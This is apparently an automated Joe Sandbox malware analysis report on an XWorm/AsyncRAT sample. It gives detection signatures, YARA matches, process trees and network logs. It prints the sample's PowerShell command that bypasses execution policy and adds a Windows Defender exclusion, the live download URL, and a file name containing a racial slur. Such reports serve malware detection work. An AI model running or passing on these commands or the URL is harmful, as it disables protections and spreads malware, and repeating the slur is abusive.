Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://ser0xen.com/sucklemydicknigger.exe

Overview

General Information

Sample URL:http://ser0xen.com/sucklemydicknigger.exe
Analysis ID:1527567
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Yara signature match

Classification

  • System is w10x64
  • chrome.exe (PID: 4428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1976,i,9986206320547753570,420349288583730614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6656 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4872 --field-trial-handle=1976,i,9986206320547753570,420349288583730614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ser0xen.com/sucklemydicknigger.exe" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • sucklemydicknigger.exe (PID: 2568 cmdline: "C:\Users\user\Downloads\sucklemydicknigger.exe" MD5: 49AA60A3EE7D3B03D16AA591024CBBC7)
    • powershell.exe (PID: 6512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x277b3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x27850:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x27965:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x2741b:$cnc4: POST / HTTP/1.1
SourceRuleDescriptionAuthorStrings
dropped/chromecache_49JoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\Downloads\Unconfirmed 610443.crdownloadJoeSecurity_XWormYara detected XWormJoe Security
      dropped/chromecache_49MALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8378:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8415:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x852a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x8026:$cnc4: POST / HTTP/1.1
      C:\Users\user\Downloads\Unconfirmed 610443.crdownloadMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8378:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8415:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x852a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x8026:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      00000008.00000000.2482762861.0000000000F72000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000008.00000000.2482762861.0000000000F72000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x8178:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8215:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x832a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x7e26:$cnc4: POST / HTTP/1.1
        Process Memory Space: sucklemydicknigger.exe PID: 2568JoeSecurity_XWormYara detected XWormJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\sucklemydicknigger.exe", ParentImage: C:\Users\user\Downloads\sucklemydicknigger.exe, ParentProcessId: 2568, ParentProcessName: sucklemydicknigger.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', ProcessId: 6512, ProcessName: powershell.exe
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\sucklemydicknigger.exe", ParentImage: C:\Users\user\Downloads\sucklemydicknigger.exe, ParentProcessId: 2568, ParentProcessName: sucklemydicknigger.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', ProcessId: 6512, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\sucklemydicknigger.exe", ParentImage: C:\Users\user\Downloads\sucklemydicknigger.exe, ParentProcessId: 2568, ParentProcessName: sucklemydicknigger.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', ProcessId: 6512, ProcessName: powershell.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\sucklemydicknigger.exe", ParentImage: C:\Users\user\Downloads\sucklemydicknigger.exe, ParentProcessId: 2568, ParentProcessName: sucklemydicknigger.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe', ProcessId: 6512, ProcessName: powershell.exe
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: /opt/package/joesandbox/database/analysis/1527567/temp/droppedscan/chromecache_49Avira: detection malicious, Label: TR/Spy.Gen
          Source: C:\Users\user\Downloads\Unconfirmed 610443.crdownloadAvira: detection malicious, Label: TR/Spy.Gen
          Source: C:\Users\user\Downloads\Unconfirmed 610443.crdownloadReversingLabs: Detection: 95%
          Source: C:\Users\user\Downloads\Unconfirmed 610443.crdownloadVirustotal: Detection: 77%Perma Link
          Source: C:\Users\user\Downloads\sucklemydicknigger.exe (copy)ReversingLabs: Detection: 95%
          Source: C:\Users\user\Downloads\sucklemydicknigger.exe (copy)Virustotal: Detection: 77%Perma Link
          Source: Chrome Cache Entry: 49ReversingLabs: Detection: 95%
          Source: Chrome Cache Entry: 49Virustotal: Detection: 77%Perma Link
          Source: /opt/package/joesandbox/database/analysis/1527567/temp/droppedscan/chromecache_49Joe Sandbox ML: detected
          Source: C:\Users\user\Downloads\Unconfirmed 610443.crdownloadJoe Sandbox ML: detected
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49750 version: TLS 1.2
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: global trafficHTTP traffic detected: GET /sucklemydicknigger.exe HTTP/1.1Host: ser0xen.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CYlyNmHefF3vTN3&MD=tUybo+Oc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CYlyNmHefF3vTN3&MD=tUybo+Oc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
